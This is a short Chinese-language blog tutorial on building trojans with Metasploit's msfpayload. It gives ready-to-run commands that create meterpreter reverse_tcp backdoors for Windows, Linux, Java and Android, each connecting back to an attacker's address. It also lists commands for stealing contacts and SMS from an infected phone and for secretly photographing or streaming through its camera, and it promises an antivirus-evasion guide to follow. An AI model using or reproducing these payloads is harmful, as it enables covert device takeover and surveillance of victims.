前言:
msfpayload不仅可以生成windows系统的木马文件,还可以生成Linux、Java、Android等环境下的木马,原理是注入一个攻击载荷(Payload),目标一旦打开,就会执行Payload,然后根据Payload的特性执行相关操作,这里我用反连的载荷reverse_tcp.
Windows系统下:
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test.exe

图1-1.

图1-2.
Linux系统下:
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test

图1-3.

图1-4.
ls -l 列出文件以及文件的详细信息;./代表执行一个文件;chmod 777 linux_backdoor表示设置linux_backdoor的权限为最高.
图1-5.
Java环境下:
msfpayload java/meterpreter/reverse_tcp LHOST=IP LPORT=port X > test.jar

图1-6.
图1-7.
Android环境下:
msfpayload android/meterpreter/reverse_tcp LHOST=IP LPORT=port X > android_backdoor.apk

图1-8.

图1-9.
dump_contacts //导出电话
dump_sms //导出信息
Webcam_list //可以看到摄像头数量
-i 1 //选择后摄像头
webcam_snap //拍照
webcam_stream //开启摄像头
后语:
这些木马程序没有经过免杀,只要用户装了杀毒软件,秒秒钟被杀,如果想让木马免杀,请关注我的下一篇文章。
最后感谢Cracer,我是一直看他的视频,文档资料学习渗透测试的,对于这些难得的免费资料,难得的分享精神和高质量的技术干货,着实让人敬畏,想要提高自己技术的朋友可以到他的网站看一下:http://cracer.com/
因为有了无数像Cracer这类人走在前面,我们才能站在巨人的肩膀上,学得更深,看得更远! |